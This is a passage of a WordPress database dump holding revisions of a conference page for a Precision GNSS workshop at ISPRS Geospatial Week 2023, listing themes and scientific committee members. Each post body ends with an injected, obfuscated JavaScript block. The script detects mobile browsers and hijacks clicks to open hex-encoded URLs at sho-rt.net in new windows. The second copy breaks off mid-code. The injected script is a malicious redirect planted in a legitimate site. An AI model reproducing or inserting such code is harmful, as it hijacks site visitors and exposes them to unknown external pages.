(3484,1,'2022-12-16 14:12:13','2022-12-16 14:12:13','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:12:13','2022-12-16 14:12:13','',3452,'https://gsw2023.com/?p=3484',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3485,1,'2022-12-16 14:13:36','2022-12-16 14:13:36','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 